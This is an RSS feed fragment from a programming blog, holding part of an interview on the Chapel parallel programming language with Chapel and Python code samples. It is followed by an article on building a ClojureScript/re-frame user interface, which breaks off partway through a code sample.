&lt;p&gt;To their immense credit, OpenMP, CUDA, and (especially) MPI have been responsible for the vast majority of scientific advances in high-performance computing over the past several decades. And if you program in these notations and are happy with them, Chapel may not be for you. Yet, just as early computational results were obtained using assembly language before giving way to more modern and portable approaches like Fortran, C, C++, Java, and eventually Python, we think parallel computing is overdue for a similar leap in evolution: from lower-level, detail-oriented approaches to higher-level ones that improve productivity and portability. As such, Chapel strives to empower the millions of desktop-only programmers to use distributed parallel computers for the first time, while also making existing parallel programmers even more effective.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What does Chapel do differently &#x2F; better?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;A characteristic shared by most general-purpose approaches to scalable parallel programming — including MPI, SHMEM, UPC, and Fortran 2008’s co-arrays — is that they express parallelism using the &lt;em&gt;Single Program, Multiple Data&lt;&#x2F;em&gt; (SPMD) programming model. The basic idea is that the user writes their program with the understanding that when it is run, multiple copies of ‘main()’ will execute simultaneously and cooperatively across a number of processors. This forces parallel programmers to write programs using a &lt;em&gt;local view&lt;&#x2F;em&gt;, in which the code expresses the perspective of a single process out of many: “What subset of the data do I need to allocate? What subset of the iteration space do I need to execute?” While the SPMD approach is sufficient for many computations, it’s also very different from traditional programming where one copy of ‘main()’ executes and all computation proceeds from that point. This requires programmers to think differently, to manage lots of bookkeeping details, and even to launch their programs differently. It also means that in order to get finer-grain parallelism, they need to mix in some other parallel programming model like POSIX threads, OpenMP, or CUDA.&lt;&#x2F;p&gt;
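&lt;p&gt;To make that local-view bookkeeping concrete, here is a small, hypothetical sketch (in Python, for brevity; the helper name and block-partitioning rule are mine, not from any SPMD library) of the index arithmetic each of the p copies of ‘main()’ must perform just to find out which slice of a global array it owns — exactly the detail a global-view language can hide:&lt;&#x2F;p&gt;

```python
# In an SPMD program, every rank answers "what subset of the data do I
# allocate / iterate over?" itself. A common answer is a block
# distribution of the global index space 0..n-1 over p ranks.

def local_block(n, p, rank):
    """Return the half-open [lo, hi) range of this rank's block of n items.

    The first (n mod p) ranks get one extra item so blocks differ in
    size by at most one.
    """
    base, rem = divmod(n, p)
    lo = rank * base + min(rank, rem)
    hi = lo + base + (1 if rank < rem else 0)
    return lo, hi

# 10 items over 4 ranks: every global index is owned by exactly one rank.
blocks = [local_block(10, 4, r) for r in range(4)]
print(blocks)  # → [(0, 3), (3, 6), (6, 8), (8, 10)]
```

&lt;p&gt;This is only the simplest case; real SPMD codes repeat this kind of arithmetic for halo exchanges, reductions, and I&#x2F;O, whereas in the Chapel fragment below the ‘dmapped Block’ declaration carries all of it.&lt;&#x2F;p&gt;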
&lt;p&gt;In stark contrast, Chapel supports what we call a &lt;em&gt;global view&lt;&#x2F;em&gt; of programming, in which a single task runs ‘main()’ and then any additional parallelism is created as features that introduce tasks are encountered. Similarly, computation and data are distributed across compute nodes when features that control locality are encountered. This permits scalable parallel programming to be far more intuitive and similar to conventional desktop programming, making it accessible to the millions of developers who might never get around to learning MPI. At the same time, Chapel’s global view also supports SPMD programming for computations or users that require it, so nothing is lost.&lt;&#x2F;p&gt;
&lt;p&gt;As an illustration of Chapel’s advantages, consider the STREAM Triad benchmark which multiplies a vector by a scalar, adds it to a second vector, and assigns it to a third. In Chapel, this can be written in a way that will use all the cores of all the system’s compute nodes as follows:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;use BlockDist, HPCCProblemSize;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;config type elemType = real;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;config const m = computeProblemSize(numArrays=3, elemType),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;         alpha = 3.0;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;proc main() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  const ProblemSpace = {1..m} dmapped Block(boundingBox={1..m});&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  var A, B, C: [ProblemSpace] elemType;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  B = 2.0;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  C = 1.0;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  A = B + alpha * C;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;In contrast, doing the same thing in C + MPI + OpenMP results in code like the following, due to the SPMD programming model as well as the lower-level notations (MPI-oriented code is in red, OpenMP in blue):&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;0-7A817ub0TK9QWgLW.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Performance-wise, how does Chapel compare to languages like C, C++, Go, Rust?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Today, Chapel programs tend to perform competitively with hand-coded C and C++. I’m not aware of any detailed performance comparisons with Go and Rust, though in the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;benchmarksgame.alioth.debian.org&#x2F;&quot;&gt;Computer Language Benchmarks Game&lt;&#x2F;a&gt; (CLBG) we’re currently ranked as being a bit faster than Go and a bit slower than Rust. That said, there are specific CLBG benchmarks where any of these five languages wins or loses, and many of the fastest entries take a far more heroic and painstaking approach than the Chapel versions.&lt;&#x2F;p&gt;
&lt;p&gt;Since we care about code clarity, we tend to graph the Computer Language Benchmarks Game results on scatter plots showing normalized execution times versus code compactness (as a proxy metric for clarity). In such views, Chapel tends to occupy a unique position, being competitive in speed with the fastest languages while also nearly as compact as scripting languages. The following two plots illustrate this (the right graph zooms in on the fastest entries for readability):&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;0-5HKm6tfdrqfXiXWP.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;0-YHDLOnTtFepJmsUV.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why did you implement Chapel using LLVM?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;In all honesty, one of my biggest regrets in the project today is that we didn’t implement Chapel using LLVM from day one. When our project started, LLVM was still in its infancy, and there was no reason to believe that it would become the foundational technology that it is today. As a result, our initial compiler approach (which remains the default today) was to compile Chapel down to C which is then compiled by the back-end C compiler of your choice. This approach treats C as a portable assembly language and has worked reasonably well for us over time. However, it is also unfortunate because the Chapel compiler may have semantic information which is challenging or impossible to convey through C to the back-end compiler.&lt;&#x2F;p&gt;
&lt;p&gt;In contrast, Chapel’s LLVM back-end permits us to translate Chapel directly to LLVM’s Intermediate Representation (IR), giving us greater semantic control plus the possibility of adding Chapel-specific extensions. Since LLVM is a popular compiler framework, using it lets us leverage developer familiarity, not to mention open-source packages. One such example is Simon Moll’s Region Vectorizer for LLVM, developed at Saarland University. We’ve found that it tends to generate better vector performance for Chapel programs than conventional C back-end compilers. But even more importantly, LLVM gives us a single, portable back-end that saves us the trouble of wrestling with the quirks and bugs that are present across the wide diversity of back-end C compiler versions that we attempt to support today. In 2018, we hope to make LLVM our default back-end for these reasons.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is GASNet? Why do you use it in Chapel?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;GASNet is an open-source library for portable inter-process communication developed by Berkeley Labs &#x2F; UC Berkeley. Its communication primitives include active messages and one-sided puts to (or gets from) the memory of a remote process. The GASNet team maps these calls down to the native Remote Direct Memory Access (RDMA) capabilities of various networks while also supporting fallback implementations over UDP or MPI for portability.&lt;&#x2F;p&gt;
&lt;p&gt;These primitives are precisely what a language like Chapel needs to compile to distributed memory systems: Active messages are the natural way to implement Chapel’s &lt;em&gt;on-clauses&lt;&#x2F;em&gt; which are used to migrate tasks from one compute node to another. Similarly, writing&#x2F;reading a variable back on the originating locale maps naturally to one-sided puts&#x2F;gets since only one process will know when such communications are required. As a result, GASNet gives us a portable way to run Chapel on virtually any distributed system. It’s also one of the best engineered and maintained open-source packages we’ve worked with, and the development team is incredibly responsive to questions and issues.&lt;&#x2F;p&gt;
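&lt;p&gt;To make that mapping concrete, here is a minimal sketch (an assumed illustration, not code from the interview) of a Chapel &lt;em&gt;on-clause&lt;&#x2F;em&gt;: migrating the task compiles down to an active message, while the remote accesses to &lt;em&gt;x&lt;&#x2F;em&gt; become one-sided gets and puts:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;proc main() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  var x = 10;       &#x2F;&#x2F; x lives in locale 0&amp;#39;s memory&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  on Locales[1] {   &#x2F;&#x2F; migrate this task to locale 1 (an active message)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    writeln(x);     &#x2F;&#x2F; reading x is a one-sided get back to locale 0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    x = 42;         &#x2F;&#x2F; writing x is a one-sided put&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;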
&lt;p&gt;&lt;strong&gt;How do you manage errors? If a long-running computation in multiple nodes crashes in one node, how do you recover the work done or re-execute it without having to re-run everything?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;For user-level errors within the program itself, Chapel supports the ability to throw and catch errors using a low-overhead approach that was inspired by Swift’s error-handling model. This is a relatively new feature set within Chapel, and it rounds out our core capabilities nicely.&lt;&#x2F;p&gt;
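&lt;p&gt;As a rough illustration of that model, here is a minimal sketch based on Chapel’s documented &lt;em&gt;throws&lt;&#x2F;em&gt;&#x2F;&lt;em&gt;try&lt;&#x2F;em&gt;&#x2F;&lt;em&gt;catch&lt;&#x2F;em&gt; syntax (an assumed example, not code from the interview):&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;proc divide(a: int, b: int): int throws {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  if b == 0 then&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    throw new IllegalArgumentError(&amp;quot;division by zero&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  return a &#x2F; b;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;proc main() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  try {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    writeln(divide(10, 0));&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  } catch e {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    writeln(&amp;quot;caught: &amp;quot;, e.message());  &#x2F;&#x2F; handle the error, no stack unwinding cost on the happy path&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;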
&lt;p&gt;That said, your question seems more oriented toward catastrophic errors that may be outside of the programmer’s control, such as having one of their compute nodes fail. Today, Chapel doesn’t handle such cases gracefully, which arguably reflects our HPC heritage. Runtime libraries and system software for HPC have a long tradition of tearing down jobs when fatal errors occur, and Chapel inherits this behavior to some extent. Resiliency is a growing concern within the HPC community as our system scales grow, and we have some ideas for improving Chapel’s ability to cope with such events. Similar features could also be attractive to users from cloud computing environments who are accustomed to elasticity in their environment. That said, we have not yet had the opportunity to pursue these ideas, so they remain an area of potential future research or collaboration.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Is there any way to trace what a live system is currently doing?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;We haven’t developed any Chapel-specific tools for tracing or visualizing Chapel executions in real-time. That said, third-party tools can be used with Chapel as with any other C program. We do have a tool named &lt;em&gt;chplvis,&lt;&#x2F;em&gt; developed by Professor Phil Nelson of Western Washington University, which supports visualizing the communication and tasking events logged by a Chapel program. This permits a user to visually inspect a Chapel program’s execution to find possible sources of overhead, but it is strictly a post-mortem tool at present.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Are you aware of anybody using Chapel in the AI&#x2F;Machine Learning world?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;We’ve definitely seen an uptick in interest from AI programmers in recent years as the field has become more prevalent, both in HPC and in general. Our most prominent user in this space at present is Brian Dolan, who is the Chief Scientist and Co-Founder of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;deep6.ai&#x2F;&quot;&gt;Deep 6 AI&lt;&#x2F;a&gt;, a start-up that is accelerating the matching of medical patients to clinical trials. After being disappointed by programming solutions that didn’t live up to their hype, Brian was drawn to Chapel last summer due to its ability to support programs with Python-like clarity, combined with the promise of supporting performance and scalability like C or Fortran with MPI. Half a year later, he’s become one of our most active and vocal users.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>One does not simply build a user interface: our ClojureScript&#x2F;re-frame app</title>
          <pubDate>Mon, 04 Dec 2017 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/one-does-not-simply-build-a-user-interface-our-clojurescript-re-frame-app/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/one-does-not-simply-build-a-user-interface-our-clojurescript-re-frame-app/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/one-does-not-simply-build-a-user-interface-our-clojurescript-re-frame-app/">&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;notamonadtutorial.com&#x2F;holiday-ping-how-we-implemented-our-first-open-source-app-with-erlang-and-clojurescript-fad5b66fc325&quot;&gt;Part I of this article&lt;&#x2F;a&gt; discussed the motivation to build &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;holidayping.lambdaclass.com&quot;&gt;HolidayPing&lt;&#x2F;a&gt; and the design and development process of the back end Erlang application. In this follow-up Facundo (the main dev) focuses on the user interface and what we learnt building it.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Discuss and vote at &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;lobste.rs&#x2F;s&#x2F;qlblgh&#x2F;one_does_not_simply_build_user_interface&quot;&gt;lobsters&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.reddit.com&#x2F;r&#x2F;programming&#x2F;comments&#x2F;7hhrb1&#x2F;one_does_not_simply_build_a_user_interface_our&#x2F;&quot;&gt;reddit&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;news.ycombinator.com&#x2F;item?id=15844203&quot;&gt;hn&lt;&#x2F;a&gt;.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-BdFV-bGWhQ5HiIL6VfY5xg.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Before getting into the details, a couple of disclaimers are in order:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;Most of my coworkers and I have done front end work over the years, but we’re all primarily back end developers. In particular, the last time I worked on a Single-Page Application, Angular 1 was king; I vaguely knew about React’s ideas, but never came close to using it.&lt;&#x2F;li&gt;
&lt;li&gt;Although we threw in a wizard and a fancy yearly calendar view, the application was your typical CRUD. Exactly the kind of thing for which &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.freecodecamp.org&#x2F;why-i-hate-your-single-page-app-f08bb4ff9134&quot;&gt;you usually don’t want to build a Single-Page Application&lt;&#x2F;a&gt;. We knew this and we chose to do a SPA anyway because this wasn’t a paid project, so we weren’t optimizing for resource efficiency but for learning.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;h3 id=&quot;language-javascript-vs-clojurescript-vs-elm&quot;&gt;Language: JavaScript vs ClojureScript vs Elm&lt;&#x2F;h3&gt;
&lt;p&gt;The first big decision was the programming language. JavaScript is the default option, but even with a solid knowledge of the language and coming out of a couple of years with Node.js as my daily work platform, becoming a productive front end JavaScript developer in 2017 is a notable feat. The tooling and even the language keep moving under your feet. For engineers who only get out of the server from time to time, it all feels like throw-away knowledge (just like my previous Angular experience is of little use today). And if you want to do fashionable JavaScript, you end up using transpilers anyway, so why not just use a different language altogether? I mean, we’re using Erlang already, it’s not like we mind throwing some weirdness into the mix.&lt;&#x2F;p&gt;
&lt;p&gt;Elm has always been a very tempting choice for us, but learning an entire language (and one so different from the others I already know) was too much to take on for a side project whose goal was to get familiar with Erlang.&lt;&#x2F;p&gt;
&lt;p&gt;And then there was ClojureScript. I was already fluent in Clojure, had some experience with ClojureScript, my Emacs was already prepared to move parentheses around… &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=gsffg5xxFQI&quot;&gt;And it delivered on its promises&lt;&#x2F;a&gt;. &lt;em&gt;lein new re-frame holiday-ping&lt;&#x2F;em&gt; is all it took to set up a workflow with a live REPL, hot code reloading (thanks primarily to &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;bhauman&#x2F;lein-figwheel&#x2F;&quot;&gt;lein-figwheel&lt;&#x2F;a&gt;) and advanced JavaScript compilation. This is not only simpler than all the disparate tools you need to do the same job in JavaScript, but also requires a smaller effort than &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;thinkrelevance.com&#x2F;blog&#x2F;2013&#x2F;06&#x2F;04&#x2F;clojure-workflow-reloaded&quot;&gt;setting up a good workflow in JVM Clojure&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;om-vs-reagent-vs-om-next-vs-re-frame&quot;&gt;Om vs Reagent vs Om.next vs re-frame&lt;&#x2F;h3&gt;
&lt;p&gt;Next up was the library or framework to build the UI. We could have gone with a simple DOM manipulation library like &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;plumatic&#x2F;dommy&quot;&gt;dommy&lt;&#x2F;a&gt;, but we decided — at our own risk — to build a Single-Page App, therefore we looked at React wrappers: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;reagent-project.github.io&#x2F;&quot;&gt;Reagent&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;omcljs&#x2F;om&quot;&gt;Om&lt;&#x2F;a&gt;. We couldn’t afford to build prototypes with both tools so we had to settle for reviewing the documentation and examples, and getting opinions from friends and the web. As Gandalf once said: &lt;em&gt;all engineers have to do is to pick a library with the time that is given to them&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Reagent right away seemed more idiomatic Clojure, relying mostly on plain data and functions (and, in the case of re-frame, &lt;em&gt;pure&lt;&#x2F;em&gt; functions) while Om used a lot of objects and protocols, &lt;em&gt;reify&lt;&#x2F;em&gt; and JavaScript interop. Reagent also used the lovely hiccup syntax to describe HTML as data, while Om leaned on functions by default (although there are &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;r0man&#x2F;sablono&quot;&gt;libraries to switch to hiccup&lt;&#x2F;a&gt;). Lastly, Om seemed to require a better knowledge of the React lifecycle, which added another layer to get familiar with. A quick comparison of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;todomvc.com&#x2F;&quot;&gt;TodoMVC&lt;&#x2F;a&gt; code illustrates why my gut feeling was to go with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;reagent-project&#x2F;reagent&#x2F;blob&#x2F;master&#x2F;examples&#x2F;todomvc&#x2F;src&#x2F;todomvc&#x2F;core.cljs#L62-L75&quot;&gt;Reagent&lt;&#x2F;a&gt; rather than &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;swannodette&#x2F;todomvc&#x2F;blob&#x2F;gh-pages&#x2F;labs&#x2F;architecture-examples&#x2F;om&#x2F;src&#x2F;todomvc&#x2F;item.cljs#L47-L83&quot;&gt;Om&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;So I leaned more towards Reagent than Om. But those only provide React wrappers; the real choice had to be between &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;omcljs&#x2F;om&#x2F;wiki&#x2F;Quick-Start-%28om.next%29&quot;&gt;Om.next&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;Day8&#x2F;re-frame&quot;&gt;re-frame&lt;&#x2F;a&gt;, otherwise I’d have had to come up with an architecture myself, and I didn’t have the background to do it effectively. I caught a great explanation of this by Mike Thompson (author of re-frame) in the Clojurians Slack:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;You can absolutely use Reagent by itself if your application is simple enough. BUT if you just use Reagent by itself then you only have the V bit of an application. As your application starts to get more complicated, you &lt;strong&gt;will&lt;&#x2F;strong&gt; start to create an architecture which adds &lt;em&gt;control logic&lt;&#x2F;em&gt; and &lt;em&gt;state management&lt;&#x2F;em&gt; — the M and C parts (even if you don’t think you are, you are). So then the question becomes: is your architecture better than re-frame’s or not? And some people prefer their own architectures and would answer “yes” :-) Fair enough.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;I think the only danger arises if this process is not conscious — if someone creates a dog’s breakfast of an architecture and doesn’t even know they’ve done it. I’ve had MANY people privately admit that’s what happened to them… and then they swapped to re-frame to get some structure back. So, my advice is… if your application is a little more complicated, be sure to make a conscious choice around architecture, because one way or another you’ll be using one.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;h3 id=&quot;css-framework&quot;&gt;CSS framework&lt;&#x2F;h3&gt;
&lt;p&gt;For styles we went with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;bulma.io&#x2F;&quot;&gt;Bulma&lt;&#x2F;a&gt;: we wanted something lighter than Bootstrap, specifically no JavaScript. Bulma is simple, easy to use, feels lightweight and looks good. In combination with hiccup it meant I was pulling off a beautiful UI without HTML, CSS or JavaScript; all my components were conveniently built by moving Clojure data around Emacs.&lt;&#x2F;p&gt;
&lt;p&gt;Perhaps the one downside was that there aren’t many pre-baked fancy components like Bootstrap has. We kind of made that choice anyway by using ClojureScript in the first place; when we wanted a complex component we either coded it ourselves (we did with tag list inputs) or we avoided them (e.g. no type-ahead selects).&lt;&#x2F;p&gt;
&lt;h3 id=&quot;developing-a-single-page-app-with-clojurescript-and-re-frame&quot;&gt;Developing a Single-Page App with ClojureScript and re-frame&lt;&#x2F;h3&gt;
&lt;p&gt;I just needed to read the first few &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;Day8&#x2F;re-frame&#x2F;tree&#x2F;master&#x2F;docs&quot;&gt;re-frame tutorials&lt;&#x2F;a&gt; to get started. It felt like re-frame built on the concepts I was already familiar with from Clojure, and I became reasonably productive in a matter of days, which was amazing considering I hardly knew the first thing about React. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;purelyfunctional.tv&#x2F;guide&#x2F;re-frame-building-blocks&#x2F;&quot;&gt;This guide&lt;&#x2F;a&gt; provides a good overview of the framework.&lt;&#x2F;p&gt;
&lt;p&gt;As mentioned, the workflow is amazing: you write pure functions, describing HTML components as Clojure data literals, and figwheel auto reloads them; if you want to play around with a dependency or interop with JavaScript and the browser APIs, just switch to the tab where the REPL is running. Instant gratification all the way.&lt;&#x2F;p&gt;
&lt;p&gt;At first, the re-frame structure can be a little overwhelming: you have events, subscriptions, effects, co-effects… In particular, it took me a while to find the justification for subscription handlers, since most of the time they were trivial reads of the database. It helped when I read enough times that a design goal of re-frame was to keep views as dumb and decoupled from state as possible; under that light all the pieces started to fall into place: re-frame handles the dirty work and side-effects, you just declare what needs to be done through functions that return data (with the bonus that your code becomes easier to test).&lt;&#x2F;p&gt;
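&lt;p&gt;For example, a trivial subscription and the dumb view that consumes it might look like this (a sketch using a hypothetical &lt;em&gt;:channels&lt;&#x2F;em&gt; key, not code from our app):&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;(re-frame&#x2F;reg-sub&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; :channel-count&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; ;; a trivial read of the app-db; the view never touches state directly&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; (fn [db _]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;   (count (:channels db))))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
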